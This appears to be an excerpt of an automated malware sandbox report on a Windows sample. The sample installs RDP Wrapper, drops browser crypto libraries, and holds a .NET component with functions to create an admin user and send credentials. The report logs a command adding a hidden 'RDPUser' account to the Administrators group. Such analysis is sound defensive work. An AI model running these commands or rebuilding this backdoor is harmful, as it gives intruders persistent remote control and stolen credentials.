Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File written: C:\Program Files\RDP Wrapper\rdpwrap.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\ProgramData\JKEHIIJJEC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr
Source:	Binary string: costura.costura.pdb.compressedlB source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySy
Source:	Binary string: costura.costura.pdb.compressed source: JKEHIIJJEC.exe, 00000010.00000000.2081801810.00000000000A2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr, JKEHIIJJEC.exe.3.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: RfxVmt.pdb source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000254A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr, rfxvmt.dll.23.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2215547025.00000000385CC000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2198205124.000000002C6E6000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2537504701.00000000222CB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000254A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr, rfxvmt.dll.23.dr
Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: KECGDBFCBK.exe.3.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: JKEHIIJJEC.exe, 00000010.00000000.2081801810.00000000000A2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr, JKEHIIJJEC.exe.3.dr
Source:	Binary string: c:\rje\tg\bj\Release\ojc.pdb source: file.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 66f5de72d9ebd_rdp[1].exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: JKEHIIJJEC.exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 16.0.JKEHIIJJEC.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2081801810.00000000000A2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JKEHIIJJEC.exe PID: 1892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\JKEHIIJJEC.exe, type: DROPPED

Source: 66f5de72d9ebd_rdp[1].exe.3.dr

Static PE information: 0xC7AB998F [Wed Feb 26 03:05:51 2076 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00418950

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F142 push ecx; ret	3_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422D3B push esi; ret	3_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DDB5 push ecx; ret	3_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C77B536 push ecx; ret	3_2_6C77B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044F116 push esi; retf	12_2_0044F117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00438B7E push cs; iretd	12_2_00438B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2227F456 push ebx; ret	15_2_2227F457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2226D568 push esp; retf	15_2_2226D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2226DB66 push esp; retf	15_2_2226DB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22203C51 push es; retf	15_2_22203C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22234BF0 push ecx; ret	15_2_22234C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2223A45D push esi; ret	15_2_2223A45F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220D29DE push edi; retn 0000h	15_2_220D29E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22136508 push B60F222Ah; ret	15_2_2213650D

Source: file.exe	Static PE information: section name: .text entropy: 7.995930954925833
Source: EBAAFCAFCB.exe.3.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: KECGDBFCBK.exe.3.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: 66f5db9e54794_vfkagks[1].exe.3.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: 66f5de72d9ebd_rdp[1].exe.3.dr	Static PE information: section name: .text entropy: 7.766648877286933
Source: JKEHIIJJEC.exe.3.dr	Static PE information: section name: .text entropy: 7.766648877286933

Persistence and Installation Behavior

Adds a new user with administrator rights

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_2490c46d /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_2490c46d /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
